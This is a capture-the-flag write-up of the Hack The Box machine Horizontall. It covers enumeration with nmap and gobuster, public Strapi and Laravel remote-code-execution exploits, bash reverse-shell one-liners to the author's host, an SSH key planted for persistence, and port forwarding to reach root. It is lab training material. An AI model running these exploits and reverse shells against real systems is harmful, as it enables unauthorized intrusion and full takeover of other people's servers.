Previous Page

nihilist - 20 / 11 / 2022

Horizontall Writeup

Introduction :

Horizontall is an easy Linux box released back in August 2021.

Part 1 : Initial Enumeration

As always we begin our Enumeration using Nmap to enumerate opened ports.
We will be using the flags -sC for default scripts and -sV to enumerate versions.

[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ sudo vim /etc/hosts
[sudo] password for nothing:

[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ nmap -sCV -p- horizontall.htb
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-20 15:08 UTC
Nmap scan report for horizontall.htb (10.129.17.82)
Host is up (0.13s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50:cd:ff:6b:0d:d5 (RSA)
|   256 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 (ECDSA)
|_  256 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 (ED25519)
80/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-title: horizontall
|_http-server-header: nginx/1.14.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.62 seconds

Part 2 : Getting User Access

Our nmap scan picked up port 80 so let's investigate it:

Trying to run gobuster on this site yields no results, so instead we look for other clues by intercepting the traffic with burpsuite:

And here we found out that there was another domain we could use: api-prod.horizontall.htb so let's add it to our hosts file:

[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ sudo vim /etc/hosts
[sudo] password for nothing:

[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ cat /etc/hosts | grep horizontall
10.129.17.82 horizontall.htb api-prod.horizontall.htb

So let's browse to the api endpoint at http://api-prod.horizontall.htb/reviews:

Then let's enumerate it with gobuster:

[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -u http://api-prod.horizontall.htb
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://api-prod.horizontall.htb
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/11/20 15:47:07 Starting gobuster in directory enumeration mode
===============================================================
/reviews              (Status: 200) [Size: 507]
/users                (Status: 403) [Size: 60]
/admin                (Status: 200) [Size: 854]
/Reviews              (Status: 200) [Size: 507]
/Users                (Status: 403) [Size: 60]

/admin looks interesting, so let's investigate it:

Here we have a strapi admin login webpage, so let's take a look at the available exploits for it:

[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ searchsploit strapi
----------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                           |  Path
----------------------------------------------------------------------------------------- ---------------------------------
Strapi 3.0.0-beta - Set Password (Unauthenticated)                                       | multiple/webapps/50237.py
Strapi 3.0.0-beta.17.7 - Remote Code Execution (RCE) (Authenticated)                     | multiple/webapps/50238.py
Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated)               | multiple/webapps/50239.py
Strapi CMS 3.0.0-beta.17.4 - Set Password (Unauthenticated) (Metasploit)                 | nodejs/webapps/50716.rb
----------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Let's use the Unauthenticated exploit:

[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ cp $(locate 50239.py) .

[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ vim 50239.py

[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ python3 50239.py http://api-prod.horizontall.htb/
[+] Checking Strapi CMS Version running
[+] Seems like the exploit will work!!!
[+] Executing exploit


[+] Password reset was successfully
[+] Your email is: admin@horizontall.htb
[+] Your new credentials are: admin:SuperStrongPassword1
[+] Your authenticated JSON Web Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjY4OTYyMjQ1LCJleHAiOjE2NzE1NTQyNDV9.9bnkS2ZxD8V5_RR-urF403xy8g-VVYaeukmKEBBGCK4


$>

This exploit basically resets the admin@horizontall.htb user's password to SuperStrongPassword1 so once we ran it we can login:

but the more interesting part is that we can execute code:

$> bash
[+] Triggering Remote code executin
[*] Rember this is a blind RCE don't expect to see output
id

However as you can see it is a blind RCE, we can't see any output, so to counter that we're going to get a reverse shell instead:

[term 1]
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ nc -lvnp 9999

[term2]
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ python3 50239.py http://api-prod.horizontall.htb/
[+] Checking Strapi CMS Version running
[+] Seems like the exploit will work!!!
[+] Executing exploit


[+] Password reset was successfully
[+] Your email is: admin@horizontall.htb
[+] Your new credentials are: admin:SuperStrongPassword1
[+] Your authenticated JSON Web Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjY4OTYyNDc3LCJleHAiOjE2NzE1NTQ0Nzd9.5lNGdTyiV9d-ciGggW5Z5Y6OJNZPARJAWBtM41qxW7A


$> bash -c 'bash -i >& /dev/tcp/10.10.16.14/9999 0>&1'
[+] Triggering Remote code executin
[*] Rember this is a blind RCE don't expect to see output

[term1]
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ nc -lvnp 9999
Connection from 10.129.17.82:42004
bash: cannot set terminal process group (1975): Inappropriate ioctl for device
bash: no job control in this shell
strapi@horizontall:~/myapi$ id
id
uid=1001(strapi) gid=1001(strapi) groups=1001(strapi)
strapi@horizontall:~/myapi$

Now that we got a reverse shell, let's upgrade it to a fully interactive tty:

strapi@horizontall:~/myapi$ which wget curl python python3
which wget curl python python3
/usr/bin/wget
/usr/bin/curl
/usr/bin/python
/usr/bin/python3

#spawn a TTY shell with python3:
strapi@horizontall:~/myapi$ python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'

#CTRL+Z to background the process
strapi@horizontall:~/myapi$ ^Z
[1]  + 3112123 suspended  nc -lvnp 9999

#stty raw it and then bring it back to the foreground:
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ stty raw -echo ; fg
[1]  + 3112123 continued  nc -lvnp 9999

#then set the TERM and SHELL env variables and the tty rows and colums:
strapi@horizontall:~/myapi$ export TERM=screen-256color
strapi@horizontall:~/myapi$ export SHELL=bash
strapi@horizontall:~/myapi$ stty rows 30 cols 200

#reset to refresh the terminal
strapi@horizontall:~/myapi$ reset

Now that we have a fully interactive TTY reverse shell, we can go grab the user flag:

strapi@horizontall:~$ cd /home/
strapi@horizontall:/home$ ls
developer
strapi@horizontall:/home$ cd developer/
strapi@horizontall:/home/developer$ ls
composer-setup.php  myproject  user.txt
strapi@horizontall:/home/developer$ cat user.txt
fcXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

And that's it! We managed to get the user flag.

Part 3 : Getting Root Access

Now just like on the BountyHunter box, we use linpeas.sh to enumerate privesc paths:

[term1]
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ cp ../BountyHunter/linpeas.sh .

[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ python3 -m http.server 9090
Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...

[term2]
strapi@horizontall:/tmp$ wget http://10.10.16.14:9090/linpeas.sh

strapi@horizontall:/tmp$ chmod +x linpeas.sh
strapi@horizontall:/tmp$ ./linpeas.sh

Now what's interesting here is the local port 8000:

As it is written, it's a local port, so let's port forward it via SSH:

[term1]
strapi@horizontall:~$ mkdir .ssh
strapi@horizontall:~$ echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAfhgjcMFy5mO4fwhQyW6vdX5bgTzqZTh9MhCW7+k6Sj nothing@nowhere' > .ssh/authorized_keys

[term2]
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ sshpub -L 8000:127.0.0.1:8000 strapi@horizontall.htb -i ~/.ssh/mainpc
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-154-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun Nov 20 17:04:40 UTC 2022

  System load:  0.0               Processes:           183
  Usage of /:   82.1% of 4.85GB   Users logged in:     0
  Memory usage: 45%               IP address for eth0: 10.129.17.82
  Swap usage:   0%


0 updates can be applied immediately.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sun Nov 20 17:01:35 2022 from 10.10.16.14
$

[term3]
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ nmap -sCV 127.0.0.1 -p 8000
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-20 17:05 UTC
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000048s latency).

PORT     STATE SERVICE VERSION
8000/tcp open  http    (PHP 7.4.22)
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.0 404 Not Found
|     Date: Sun, 20 Nov 2022 17:05:31 GMT
|     Connection: close
|     X-Powered-By: PHP/7.4.22
|     Cache-Control: no-cache, private
|     date: Sun, 20 Nov 2022 17:05:31 GMT
|     Content-type: text/html; charset=UTF-8
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <title>Not Found</title>
|     <!-- Fonts -->
|     <link rel="preconnect" href="https://fonts.gstatic.com">
|     <link href="https://fonts.googleapis.com/css2?family=Nunito&display=swap" rel="stylesheet">
|     <style>
|     normalize.css v8.0.1 | MIT License | github.com/necolas/normalize.css */html{line-height:1.15;-webkit-text-size-adjust:100%}body{margin:0}a{background-color:transparent}code{font-family:monospace,monospace;font-size:1em}[hidden]{display:none}html{font-family:system-ui,-app
|   GetRequest:
|     HTTP/1.0 200 OK
|     Date: Sun, 20 Nov 2022 17:05:26 GMT
|     Connection: close
|     X-Powered-By: PHP/7.4.22
|     Content-Type: text/html; charset=UTF-8
|     Cache-Control: private, must-revalidate
|     Date: Sun, 20 Nov 2022 17:05:26 GMT
|     pragma: no-cache
|     expires: -1
|     Set-Cookie: XSRF-TOKEN=eyJpdiI6InJ6Rjhhc0RMR3E0d242U0NrNzNzQ3c9PSIsInZhbHVlIjoiSWNaeGhCZitFTURXR2VlM005QmdsVm5BNFk2cThPN0g1OEJvTi9iUFYyNEpHQWJMZTJuTmtPVGZla3NwbFl5NkhNRHF4ajRBTFFoYzJaL2FCK2pocVkyMTIwVHBqeWRieU1zQWE4S095T1dOTG1rWkZURGF2RnVteTlmdTJ0S0MiLCJtYWMiOiIxZDM2ODdjZjExMmQxYzY4M2Y3ZjZiN2JlYjk2NzNkMWE0YTJkMGExOTkxZjAyZDE4ZDNjMzVjNmI3NTQ0NjdhIn0%3D; expires=Sun, 20-Nov-2022 19:05:26 GMT; Max-Age=7200; path=/; samesite=lax
|_    Set-Cookie: laravel_session=eyJpdiI6IkhtTlZjUnBzZ2RkSDNZMGNhNjA5bWc9PSIsInZhbHVlIjoiYXY0QlozV004N2pydDZ5MVJ2QnJ2RmRnZUYrWVdQR0l4VWVJWmhaMFdpSXFITDdrVnNzYzF4RGhFZlkxczlmSEtaQkFrUDlLcVVXQlBiOTh3U3FxclpoVGxpaDNZMzkvSXhreEZON3

After port-forwarding the port 8000 we see it's a laravel webserver:

[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -u http://127.0.0.1:8000
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://127.0.0.1:8000
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/11/20 17:12:29 Starting gobuster in directory enumeration mode
===============================================================
/profiles             (Status: 500) [Size: 616204]

gobuster found /profiles so let's investigate it:

So we know that there's a laravel 8 website on port 8000, and where it is located on the machine thanks to the error we're seeing in /profiles, so let's look for exploits:

[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ while true ; do sshpub -L 8000:127.0.0.1:8000 strapi@horizontall.htb -i ~/.ssh/mainpc ; done

#since the ssh port forwarding keeps dying, run it like that ^

[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ searchsploit laravel 8
----------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                           |  Path
----------------------------------------------------------------------------------------- ---------------------------------
Aimeos Laravel ecommerce platform 2021.10 LTS - 'sort' SQL injection                     | php/webapps/50538.txt
Laravel - 'Hash::make()' Password Truncation Security                                    | multiple/remote/39318.txt
Laravel 8.4.2 debug mode - Remote code execution                                         | php/webapps/49424.py
Laravel Log Viewer < 0.13.0 - Local File Download                                        | php/webapps/44343.py
Laravel Nova 3.7.0 - 'range' DoS                                                         | php/webapps/49198.txt
PHP Laravel 8.70.1 - Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF)     | php/webapps/50525.txt
PHP Laravel Framework 5.5.40 / 5.6.x < 5.6.30 - token Unserialize Remote Command Executi | linux/remote/47129.rb
UniSharp Laravel File Manager 2.0.0 - Arbitrary File Read                                | php/webapps/48166.txt
UniSharp Laravel File Manager 2.0.0-alpha7 - Arbitrary File Upload                       | php/webapps/46389.py
----------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Let's take a look at the RCE one:

[term1]
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ python 49424.py http://127.0.0.1:8000 /home/developer/myproject/storage/logs/laravel.log 'bash -c "(bash -i &>/dev/tcp/10.10.16.14/4444 0>&1)&"'

Exploit...

[term2]
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ nc -lvnp 4444

Connection from 10.129.17.82:33968
bash: cannot set terminal process group (27737): Inappropriate ioctl for device
bash: no job control in this shell
root@horizontall:/home/developer/myproject/public#
root@horizontall:/home/developer/myproject/public# id
id
uid=0(root) gid=0(root) groups=0(root)
root@horizontall:/home/developer/myproject/public# cd
cd
root@horizontall:~# cat root.txt
cat root.txt
bdXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

And that's it! We managed to get the root flag.

Conclusion

Here we can see the progress graph :